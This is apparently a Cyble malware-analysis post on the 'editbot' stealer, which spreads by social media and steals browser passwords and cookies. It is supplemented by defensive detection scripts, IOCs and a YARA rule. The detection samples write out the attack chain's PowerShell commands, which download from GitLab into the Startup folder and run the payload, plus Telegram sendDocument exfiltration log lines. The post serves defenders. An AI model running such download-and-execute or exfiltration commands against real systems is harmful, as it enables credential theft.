Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) recently came across a WinRAR archive file on VirusTotal with minimal detection. Subsequent analysis revealed that it is part of a new campaign targeted at Social Media users.
- This campaign encompasses a multi-stage attack, where each phase has a distinct role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.
- Threat Actors (TAs) use open-source code-sharing platforms, such as Gitlab, to retrieve the next stage payloads.
- The downloaded payload is a new Python-based stealer designed to pilfer process information and browser-stored data such as passwords, cookies, web data, and more. It exfiltrates the stolen information to the TAs through a Telegram channel.
Overview
On December 5th, CRIL came across a potentially malicious RAR file on VirusTotal. The investigation unfolded rapidly as similar files began surfacing on VirusTotal within a short timeframe. The image below shows similar files identified in VirusTotal.
Subsequent investigation revealed that the identified archive file is linked to an ongoing scam targeting Social Media users. The scam revolves around the theme ‘defective product to be sent back.’ The TAs usually exploit the appeal of well-known products and compelling content to lure users into interacting with deceptive pages or groups.
As users comment on or like posts within these fake pages or groups, they inadvertently expand the reach of the fraudulent content, causing it to appear in their network’s news feeds. This helps the TAs spread their scam to a broader audience.
The image below displays a RAR attachment from this scam identified on social media, resembling the one we have identified in VirusTotal.
The identified RAR archive files contain a first-stage malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json” (unused), as shown below.
Using the extracted BAT file, the TAs have tried to execute a multi-stage infection strategy to deliver their final payload onto the victim’s system.
The sequence of the infection chain is shown in the image below.
This final payload is a Windows-specific Python-based stealer designed to collect various sensitive information, such as passwords, cookies, web data, active system processes, etc. After gathering and compressing the stolen files, the stealer transmits them to a Telegram bot managed by the TAs.
Since this stealer has no established name, we refer to it as “editbot” for tracking purposes. The name is taken from the author’s GitLab account or project name found in the repository.
Technical Analysis
When executing the extracted .bat file, it uses PowerShell commands to perform various download activities in the system, as shown in the figure below.
The first PS command downloads another .bat file from an open-source code-sharing platform (hxxps://gitlab[.]com/is9682048/rr/-/raw/main/startup) and saves it as “WindowsSecure.bat” in the user’s Startup folder, ensuring the execution of the downloaded BAT file during each login session.
The image below shows the newly downloaded BAT file in the startup location and its content.
The BAT file “WindowsSecure.bat” serves the purpose of ensuring persistence. It is designed to execute the Python stealer that will be downloaded at a later stage, specifically located at “C:\Users\Public\Document\libb1.py”, every time the system starts.
The second PowerShell command is employed to retrieve a ZIP file from the previously mentioned GitLab location and save it locally as “Document.zip” within the “C:\Users\Public” directory.
The third PowerShell command unzips the contents of the downloaded ZIP file into the directory ‘C:/Users/Public/Document,’ which includes a Python script along with its associated Python package files. The TAs took measures to guarantee a seamless execution of the main script by including all necessary components in the victim’s machine.
The below image shows the extracted content of the ZIP file.
The final PowerShell command executes the Python script named “libb1.py” found in the unzipped directory “C:\Users\Public\Document”. This Python script serves as the malicious information stealer, which is identified as “editbot”.
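The four-command chain above is easier to catch as a sequence than as individual commands, since a single download or unzip looks like ordinary admin activity. The following detection example is added here and is not code from Cyble or from the campaign; it scores PowerShell command lines (for instance from Script Block Logging, Event ID 4104, or EDR command-line telemetry) against indicators taken from the description of the chain. The cmdlet names in the constructed sample events (Invoke-WebRequest, Expand-Archive) are assumptions, because the post does not reproduce the exact commands; the GitLab path and file names come from the analysis above.

```python
import re

# Heuristics for the staged PowerShell activity described in the analysis. The
# exact cmdlets are assumptions: the post only says the BAT file "uses
# PowerShell commands" to download, unzip and execute, so the patterns key on
# the artifacts (raw GitLab URL, Startup-folder BAT, ZIP and .py under Public)
# rather than on specific cmdlet names.
INDICATORS = {
    "raw_gitlab_download": re.compile(r"gitlab\.com/\S+?/-/raw/", re.I),
    "startup_bat_drop": re.compile(r"\\Startup\\\S+?\.bat\b", re.I),
    "public_zip_drop": re.compile(r"C:\\Users\\Public\\\S*?\.zip\b", re.I),
    "archive_extract": re.compile(r"\b(?:Expand-Archive|ExtractToDirectory)\b", re.I),
    "public_py_exec": re.compile(r"C:\\Users\\Public\\\S*?\.py\b", re.I),
}

# Any one command can be innocuous; the chain is the signal. Three distinct
# indicators across a session is an assumed threshold, tune it to your telemetry.
CHAIN_THRESHOLD = 3

# CONSTRUCTED sample command lines mirroring the chain in the post (cmdlet
# names assumed); line 0 is benign admin activity used as a negative control.
SAMPLE_EVENTS = [
    r"Get-ChildItem C:\Users\Public\Documents | Measure-Object",
    r"Invoke-WebRequest 'https://gitlab.com/is9682048/rr/-/raw/main/startup' -OutFile ($env:APPDATA + '\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat')",
    r"Invoke-WebRequest 'https://gitlab.com/is9682048/rr/-/raw/main/Document.zip' -OutFile C:\Users\Public\Document.zip",
    r"Expand-Archive -Path C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document -Force",
    r"& C:\Users\Public\Document\python.exe C:\Users\Public\Document\libb1.py",
]


def score_event(text: str) -> list[str]:
    """Return the names of the indicators a single command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage_powershell(events: list[str]) -> dict:
    """Flag suspicious commands individually and decide whether, taken
    together, they reproduce the multi-stage chain."""
    flagged = [(i, hits) for i, e in enumerate(events) if (hits := score_event(e))]
    distinct = sorted({h for _, hits in flagged for h in hits})
    return {
        "flagged": flagged,
        "distinct": distinct,
        "chain_detected": len(distinct) >= CHAIN_THRESHOLD,
    }


if __name__ == "__main__":
    result = triage_powershell(SAMPLE_EVENTS)
    for idx, hits in result["flagged"]:
        print(f"event {idx}: {', '.join(hits)}")
    print("chain detected:", result["chain_detected"])
```

Run against a session's worth of 4104 events per host rather than the whole log, so that the threshold reflects one actor's activity. The Startup-folder and Public-directory patterns are the most durable of the five: the GitLab account and file names are campaign-specific and will change, but a user-writable drop location feeding an autostart entry is the technique itself.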
Editbot – Python Stealer
The Python script “libb1.py” is a piece of malware designed to collect sensitive information from various browsers and send it to a Telegram channel controlled by the TAs.
Upon executing the Python script through the batch file, the stealer runs the ‘tasklist’ command to enumerate all running processes on the targeted system. The obtained output is captured and saved in a file located at “C:\Users\<Username>\AppData\Local\Temp\<newly_generated_folder>\window.txt”.
The newly generated folder name incorporates details such as the country code, IP address, and a timestamp extracted from the victim’s system, as shown in the figure below.
After collecting the list of currently running processes, the stealer focuses on extracting sensitive information from several web browsers, including Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc, and Chromium, as shown in the code snippet below.
Chromium-Based Browsers
The stealer retrieves files such as Cookies, Login Data, Web Data, and Local State from the respective browser profile folders, as shown in the previous figure. Upon identification, the stealer copies these files to a designated directory previously created by the stealer within the %temp% folder.
The below image shows the code for retrieving the browser profile files from the compromised system.
Then, the stealer extracts the login details from the obtained browser profile files such as “local state” and “login data”, decrypts the passwords, and saves the URL, username, and decrypted password into a newly created text file named “pass.txt.” This file is also located in the same directory created by the stealer within the %temp% folder.
The image below shows the code snippet to decrypt the browser login details.
After successfully collecting the passwords, the stealer connects to the SQLite database file named “Cookies,” which contains cookie information from various web browsers.
It proceeds to execute a query on the ‘cookies’ table, retrieving specific details like host, name, value, the HTTP-only attribute (‘is_httponly’), secure marking (‘is_secure’), and expiration time (‘expires_utc’).
The below image shows the code used to extract cookie information from the victim’s system.
After extracting cookie information, the stealer checks if the hostname is associated with a particular social media site. If so, the details are stored in ‘cookie.txt’ within the %temp% folder created by the stealer.
The image below shows the stealer code gathering cookies specifically related to social media platforms.
Firefox
The stealer uses a similar method to gather data from Mozilla Firefox as it does with Chromium-based browsers. For Firefox, the malware decrypts the credentials stored in the ‘logins.json’ file to recover usernames and passwords. Additionally, it navigates through the ‘cookies.sqlite’ database, extracting cookies related to social media sites.
The below image shows the code used to extract data from Firefox browser profiles.
After successfully collecting all the information, the stealer creates a ZIP archive containing TXT files with the pilfered data and, subsequently, stores it in the %temp% directory.
The image below shows the ZIP file, ready for exfiltration.
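Every stage described so far leaves a file on disk: the Startup-folder BAT, the ZIP and script under C:\Users\Public, and the per-victim folder in %temp% holding window.txt, pass.txt, cookie.txt and the final ZIP. The host-triage script below is an added example, not Cyble's tooling, that checks those locations under a given root (a live C:\ or a mounted disk image). It builds a constructed tree of empty placeholder files in a temporary directory to demonstrate itself offline; the loot folder name and the Roaming-profile path of the Startup folder are assumptions, since the post gives the folder's components (country code, IP, timestamp) but not its exact format.

```python
from pathlib import Path
import tempfile

# Locations named in the analysis, expressed relative to a user profile so the
# same checks run against a live host, a mounted image, or a test tree.
STARTUP_REL = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
TEMP_REL = Path("AppData/Local/Temp")
LOOT_FILES = {"window.txt", "pass.txt", "cookie.txt"}


def triage_host(root: Path) -> list[dict]:
    """Report persistence, payload and collection artifacts found under root.
    On a live Windows host call triage_host(Path('C:/'))."""
    findings: list[dict] = []
    users = root / "Users"
    public = users / "Public"
    # Stage 2/3: ZIP dropped in Public and the stealer unpacked beneath it.
    for rel in ("Document.zip", "Document/libb1.py"):
        p = public / rel
        if p.is_file():
            findings.append({"stage": "payload", "path": str(p)})
    if not users.is_dir():
        return findings
    for profile in sorted(users.iterdir()):
        if profile.name == "Public" or not profile.is_dir():
            continue
        # Stage 1: Startup-folder BAT that launches libb1.py at logon.
        bat = profile / STARTUP_REL / "WindowsSecure.bat"
        if bat.is_file():
            body = bat.read_text(errors="ignore")
            findings.append({"stage": "persistence", "path": str(bat),
                             "refs_libb1": "libb1.py" in body})
        # Stage 4: per-victim folder in %temp% with the TXT files and ZIP.
        temp = profile / TEMP_REL
        if not temp.is_dir():
            continue
        for d in sorted(temp.iterdir()):
            if not d.is_dir():
                continue
            names = {c.name for c in d.iterdir()}
            hit = names & LOOT_FILES
            if hit:
                findings.append({"stage": "collection", "path": str(d),
                                 "files": sorted(hit),
                                 "zip": any(n.lower().endswith(".zip") for n in names)})
    return findings


def build_constructed_tree(root: Path, user: str = "victim") -> None:
    """Lay down CONSTRUCTED placeholder files (no malware content) in the
    locations the analysis names, so triage_host() can be exercised offline."""
    public = root / "Users" / "Public"
    (public / "Document").mkdir(parents=True)
    (public / "Document.zip").write_bytes(b"placeholder")
    (public / "Document" / "libb1.py").write_text("# placeholder, not the stealer\n")
    startup = root / "Users" / user / STARTUP_REL
    startup.mkdir(parents=True)
    (startup / "WindowsSecure.bat").write_text(
        "@echo off\nREM placeholder that references C:\\Users\\Public\\Document\\libb1.py\n")
    # Folder name format is assumed; the post only says it holds country code, IP and timestamp.
    loot = root / "Users" / user / TEMP_REL / "XX_203.0.113.7_20231205"
    loot.mkdir(parents=True)
    for name in LOOT_FILES:
        (loot / name).write_text("")
    (loot / "XX_203.0.113.7_20231205.zip").write_bytes(b"placeholder")


def demo() -> list[dict]:
    """Build the constructed tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_constructed_tree(root)
        return triage_host(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A "collection" finding whose folder also contains a ZIP means the archive was staged and exfiltration may already have happened, so browser sessions on that host should be treated as compromised and cookies invalidated. The path and file names are campaign-specific; pair this with the YARA rule and hashes at the end of the post rather than relying on it alone.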
Using a hardcoded bot token, the stealer calls the Telegram Bot API “sendDocument” method to send the ZIP file from the victim’s system to the TAs.
The image below shows the stealer’s POST request to a designated URL, accompanied by additional data. This data encompasses a caption featuring various details such as country, city, country code, system information, IP address, username, and a generated ID. The POST request also incorporates the inclusion of the ZIP file.
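The exfiltration step is visible on the network as an HTTP POST to the Telegram Bot API with a multipart body, which makes it a good place for a network-side detection. The example below is added here and is not Cyble's code; it parses constructed proxy-log lines in an assumed space-separated format, flags POSTs to api.telegram.org whose path is a bot method that can carry data out, and records only the numeric bot id, never the secret part of the token. The sample token and client addresses are placeholders.

```python
import re

TELEGRAM_API_HOST = "api.telegram.org"
# Bot API paths have the form /bot<bot_id>:<secret>/<method>. The secret is a
# credential for the TAs' bot; findings keep the numeric id only, so alerts can
# be shared without leaking the token into tickets or SIEM dashboards.
BOT_METHOD = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)")
# Assumed severity mapping: sendDocument carries files (the ZIP in the post),
# sendMessage carries text and is a weaker signal on its own.
EXFIL_METHODS = {"sendDocument": "high", "sendMessage": "medium"}

# CONSTRUCTED proxy-log format: ts src method host path status bytes_out content_type
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "
    r"(?P<status>\d{3}) (?P<bytes>\d+) (?P<ctype>\S+)$"
)

# CONSTRUCTED sample log: one benign request, one document upload, one
# harmless bot call (getMe) and one text message, all with a placeholder token.
SAMPLE_LOG = """\
2023-12-05T10:14:02Z 10.0.0.15 GET www.example.com /index.html 200 1532 -
2023-12-05T10:14:09Z 10.0.0.15 POST api.telegram.org /bot1234567890:EXAMPLE_TOKEN_PLACEHOLDER/sendDocument 200 48211 multipart/form-data
2023-12-05T10:15:01Z 10.0.0.22 GET api.telegram.org /bot1234567890:EXAMPLE_TOKEN_PLACEHOLDER/getMe 200 210 -
2023-12-05T10:16:40Z 10.0.0.15 POST api.telegram.org /bot1234567890:EXAMPLE_TOKEN_PLACEHOLDER/sendMessage 200 412 application/json
"""


def detect_telegram_exfil(log_text: str) -> list[dict]:
    """Return one finding per POST to a Telegram bot method that can carry data out."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m["host"].lower() != TELEGRAM_API_HOST or m["method"] != "POST":
            continue
        pm = BOT_METHOD.match(m["path"])
        if not pm or pm["method"] not in EXFIL_METHODS:
            continue
        findings.append({
            "ts": m["ts"],
            "src": m["src"],
            "bot_id": pm["bot_id"],          # secret deliberately dropped
            "api_method": pm["method"],
            "severity": EXFIL_METHODS[pm["method"]],
            "bytes_out": int(m["bytes"]),
            "multipart": m["ctype"].lower().startswith("multipart/"),
        })
    return findings


if __name__ == "__main__":
    for f in detect_telegram_exfil(SAMPLE_LOG):
        print(f)
```

Full paths are only available where the proxy terminates TLS; without interception the log shows just the SNI/host, and the rule degrades to "POST to api.telegram.org from endpoints that have no business running Telegram bots", which is still worth alerting on in most corporate environments. The bot id is useful as a pivot when reporting the bot for takedown.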
In July, Check Point researchers identified a comparable scam targeting Social Media users. The scam involved fake ads for ChatGPT, Google Bard, and other AI services, tricking users into downloading malware. This incident serves as another instance highlighting the persistent nature of threats on social media platforms.
Conclusion
The recent surge in Social Media scams has intensified as TAs adopt this method to distribute their payloads. Although campaigns of this kind are already known, the multi-stage structure of this attack adds sophistication and makes detection harder.
Notably, the emergence of a new stealer suggests potential involvement by Initial Access Brokers, groups, or individuals specialized in acquiring and selling access or credentials to compromised systems.
The emergence of the new editbot Stealer, specifically targeting sensitive information related to social media platforms, raises significant concerns in the current cybersecurity threat landscape.
Our Recommendations
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices as mentioned below:
- Be cautious when receiving private messages on Social Media, especially from unknown or unexpected sources.
- Avoid interacting with messages that seem suspicious or contain unsolicited attachments.
- Confirm the authenticity of the sender before opening or downloading any attachments or clicking on links in Social Media messages.
MITRE ATT&CK® Techniques
| Tactic | Technique (ID) | Description |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | This stealer could reach users via phishing sites. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | PowerShell commands are used to download and execute the stealer. |
| Discovery (TA0007) | Process Discovery (T1057) | The stealer captures all running processes. |
| Persistence (TA0003) | Registry Run Keys / Startup Folder (T1547.001) | The stealer adds a BAT file to the Startup folder for persistence. |
| Collection (TA0009) | Data from Local System (T1005) | The stealer collects sensitive data from the victim’s system. |
| Credential Access (TA0006) | Steal Web Session Cookie (T1539) | The stealer collects browser cookies for social media sites. |
| Credential Access (TA0006) | Credentials from Password Stores (T1555) | The stealer decrypts browser-stored login data. |
| Exfiltration (TA0010) | Exfiltration Over Web Service (T1567) | Uses a Telegram channel to exfiltrate data. |
Indicators of Compromise (IOCs)
| Indicator | Indicator Type | Details |
|---|---|---|
| fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7 | SHA256 | Screenshot-Product-Photo-Sample_25929.rar |
| feff390b99dfe7619a20748582279bc13c04f52a | SHA1 | Screenshot-Product-Photo-Sample_25929.rar |
| ca5bee4607ddd920729e5c2b4fc89bbc | MD5 | Screenshot-Product-Photo-Sample_25929.rar |
| d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80 | SHA256 | Screenshot Product Photo Sample.bat |
| 18e96d94089086848a0569a1e1d8051da0f6f444 | SHA1 | Screenshot Product Photo Sample.bat |
| e9e4cd111cadcf94c469365354df3fdc | MD5 | Screenshot Product Photo Sample.bat |
| 3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d | SHA256 | Python stealer (libb1.py) |
| eed59a282588778ffbc772085b03d229a5d99e35 | SHA1 | Python stealer (libb1.py) |
| 669e7ac187fb57c4d90b07d9a6bb1d42 | MD5 | Python stealer (libb1.py) |
| 9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0 | SHA256 | product-_img_2023-12_86-13a30f_13373.rar |
| 93d70f02b2ee2c4c2cd8262011ed21317c7d92de | SHA1 | product-_img_2023-12_86-13a30f_13373.rar |
| f23465088d26e90514b5661936016c05 | MD5 | product-_img_2023-12_86-13a30f_13373.rar |
| bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa | SHA256 | image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |
| cf019e96e16fdaa504b29075aded36be27691956 | SHA1 | image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |
| c3a447c5c6c73d80490347c1b4afe9d5 | MD5 | image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |
Yara Rule
```yara
rule Editbot_Stealer
{
    meta:
        author = "Cyble"
        description = "Detects editbot Stealer"
        date = "2023-12-11"
        os = "Windows"
        threat_name = "editbot Stealer"
        scan_type = "file"
        severity = 90
        reference_sample = "3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d"

    strings:
        // GitLab raw path of the stealer repository
        $a = "raw/main/editbot" ascii wide
        // Script name dropped under C:\Users\Public\Document
        $b = "libb1.py" ascii wide
        // Output file used for harvested social media cookies
        $c = "cookiefb.txt" ascii wide
        // Chromium "Local State" file read for the encryption key
        $d = "Local State" ascii wide
        // Chromium data marker used by the stealer
        $e = "data_chromium" ascii wide

    condition:
        all of them
}
```
Source: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/